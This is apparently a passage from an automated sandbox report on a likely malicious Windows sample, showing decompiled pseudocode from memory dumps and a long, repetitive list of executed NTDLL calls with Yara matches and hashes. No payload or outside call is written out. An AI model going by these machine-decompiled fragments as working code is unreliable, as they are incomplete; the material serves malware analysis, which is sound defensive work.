                                                        						}
                                                        					}
                                                        					_t130 = _t118 - 1;
                                                        					if(_t130 != 0) {
                                                        						if(_t130 == 1) {
                                                        							goto L21;
                                                        						}
                                                        						_t127 = 1;
                                                        						goto L36;
                                                        					}
                                                        					if(_t167 >= 0x80) {
                                                        						L7:
                                                        						if(_t167 == 0x3a) {
                                                        							_t158 = 0;
                                                        							if(_v12 > 0 || _v8 > 6) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									_v8 = _v8 + 1;
                                                        									L13:
                                                        									_v20 = _t158;
                                                        									goto L14;
                                                        								}
                                                        								if(_v28 != 0) {
                                                        									break;
                                                        								}
                                                        								_v28 = _v8 + 1;
                                                        								_t143 = 2;
                                                        								_v8 = _v8 + _t143;
                                                        								goto L47;
                                                        							}
                                                        						}
                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                        							break;
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							_t158 = 0;
                                                        							goto L13;
                                                        						}
                                                        					}
                                                        					if(E00B7685D(_t167, 4) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						goto L19;
                                                        					}
                                                        					if(E00B7685D(_t167, 0x80) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						if(_v12 > 0) {
                                                        							break;
                                                        						}
                                                        						_a7 = 1;
                                                        						goto L19;
                                                        					}
                                                        					goto L7;
                                                        				}
                                                        				 *_a8 = _t164;
                                                        				if(_v12 != 0) {
                                                        					if(_v12 != 3) {
                                                        						goto L29;
                                                        					}
                                                        					_v8 = _v8 + 1;
                                                        				}
                                                        				if(_v28 != 0 || _v8 == 7) {
                                                        					if(_v20 != 1) {
                                                        						if(_v20 != 2) {
                                                        							goto L29;
                                                        						}
                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        						L65:
                                                        						_t105 = _v28;
                                                        						if(_t105 != 0) {
                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                        							E00B58980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                        							_t110 = 8;
                                                        							E00B4DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_v12 != 0) {
                                                        						if(_v16 > 3) {
                                                        							goto L29;
                                                        						}
                                                        						_t114 = E00B7EE02(_v24, 0, 0xa);
                                                        						_t170 = _t170 + 0xc;
                                                        						if(_t114 > 0xff) {
                                                        							goto L29;
                                                        						}
                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                        						goto L65;
                                                        					}
                                                        					if(_v16 > 4) {
                                                        						goto L29;
                                                        					}
                                                        					_t115 = E00B7EE02(_v24, 0, 0x10);
                                                        					_t170 = _t170 + 0xc;
                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                        					goto L65;
                                                        				} else {
                                                        					goto L29;
                                                        				}
                                                        			}


























                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID:
                                                        • API String ID: 3965848254-0
                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction ID: b10ae6383ec1f18518718b6ebb57ce6c9f72569b91cc4fc43e41503ed78a37c2
                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction Fuzzy Hash: DD918D31D0420AEBDF24DF98C8456BEB7F4EF55314F20C4FAD469A6162E7309A81CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 44%
                                                        			E00B6B7D3(void* __ecx, void* __edx, void* __eflags) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* _t21;
                                                        				void* _t24;
                                                        				void* _t25;
                                                        				void* _t27;
                                                        
                                                        				_t24 = __edx;
                                                        				_t23 = __ecx;
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				_push(0);
                                                        				_push(4);
                                                        				_push( &_v12);
                                                        				_push(0x24);
                                                        				_t19 = E00B3FAE8(0xffffffff);
                                                        				if(_t19 < 0) {
                                                        					_push(_t19);
                                                        					E00B83915(_t21, _t23, _t24, _t25, _t27, __eflags);
                                                        					asm("int3");
                                                        					_t19 = 0xc0000001;
                                                        					return 0xc0000001;
                                                        				} else {
                                                        					_t2 =  &_v8;
                                                        					 *_t2 = _v8 & 0x00000000;
                                                        					__eflags =  *_t2;
                                                        					__eax = _v12;
                                                        					_push(__ebx);
                                                        					_push(__esi);
                                                        					__ebx = 0x7fffffed;
                                                        					_push(__edi);
                                                        					_t5 = __ebx - 0x2a; // 0x7fffffc3
                                                        					__edi = _t5;
                                                        					_t6 = __ebx + 0x12; // 0x7fffffff
                                                        					__esi = _t6;
                                                        					do {
                                                        						__ecx = 0x7fffffed;
                                                        						__edx = __eax * 0x7fffffed >> 0x20;
                                                        						__eax = __eax + __edi;
                                                        						asm("adc edx, 0x0");
                                                        						__eax = E00B613F0(__eax, __edx, __esi, 0);
                                                        						__ecx = _v8;
                                                        						_v8 = _v8 + 4;
                                                        						__eflags = _v8 - 0x200;
                                                        						 *(_v8 + 0xc24f20) = __eax;
                                                        					} while (_v8 < 0x200);
                                                        					__edx = __eax * 0x7fffffed >> 0x20;
                                                        					__eax = __eax + __edi;
                                                        					asm("adc edx, 0x0");
                                                        					__eax = E00B613F0(__eax, __edx, __esi, 0);
                                                        					_pop(__edi);
                                                        					 *0xc20124 = __eax;
                                                        					__eax = 0;
                                                        					_pop(__esi);
                                                        					__eax = 1;
                                                        					__eflags = 1;
                                                        					_pop(__ebx);
                                                        					return 1;
                                                        				}
                                                        			}













                                                        APIs
                                                          • Part of subcall function 00B3FAE8: LdrInitializeThunk.NTDLL ref: 00B3FAF3
                                                        • __aullrem.LIBCMT ref: 00B6B816
                                                        • __aullrem.LIBCMT ref: 00B6B83D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: __aullrem$InitializeThunk
                                                        • String ID: [A=
                                                        • API String ID: 241165383-4002878675
                                                        • Opcode ID: 51a7cd5a63fd7b13a8e8a8f5e0b9c1614b6f5464636e33419f23d4c46ffd8481
                                                        • Instruction ID: 2a3418f7a44d0eee95adac922cfad429902b0462219e29b4be743e50e4925973
                                                        • Opcode Fuzzy Hash: 51a7cd5a63fd7b13a8e8a8f5e0b9c1614b6f5464636e33419f23d4c46ffd8481
                                                        • Instruction Fuzzy Hash: 9901D8B2A04204BFFB14DB98CC4AFAF76FDDB85718F240199B611EB5C1E6B4AD018764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00084BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00084BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0008A3AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 33aa133b1828de7a33f34ff2abfb8f4a657c94ad4ae741a971a1f8b17fb592ea
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: eab6c33f23b55d13730f8a1bb79f868c5d922428d3f24a8a171e60897e531aec
                                                        • Instruction ID: fcef1ac85d36dc38eeec39f5fcd415ae08c9ea63f69a6f46d4892c2a72869059
                                                        • Opcode Fuzzy Hash: eab6c33f23b55d13730f8a1bb79f868c5d922428d3f24a8a171e60897e531aec
                                                        • Instruction Fuzzy Hash: AB21F4B6204108AFDB08DF98DC90DEB73A9FF8C714B15825AFA4D97241D630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: 9146610a82c7d28884839af937c71fe69ddc05b2b6cb9a8e0f7e58f84478092f
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: 28F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 411769a3e80819cae2d2dc14c90e252633aadd9aa83bf34a4d9b3a106ac9d8b6
                                                        • Instruction ID: 391b59a6037747a6ba5b7afb0432f9722d10277a979745f982ff5c050fc02cc3
                                                        • Opcode Fuzzy Hash: 411769a3e80819cae2d2dc14c90e252633aadd9aa83bf34a4d9b3a106ac9d8b6
                                                        • Instruction Fuzzy Hash: D5F05EB6300114ABD720EF98DC80EEB73A9FF88720F248559FA489B241C630E91087A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00072D11,00002000,00003000,00000004), ref: 0008A579
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: bc206d9f2071b923372039f064e3137b2ea009f243bd174e6cd940b4fb91c3e0
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: 27F015B2200208ABDB14DF89CC81EEB77ADEF88754F118159BE0897242C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 8da779fb4580b145d932e8e32d90a0ec373589454ed40f45412f1b399caffab5
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: F0D012752002146BD710EBD8CC45ED7775CEF44750F154455BA585B242C530F50087E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00089128
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
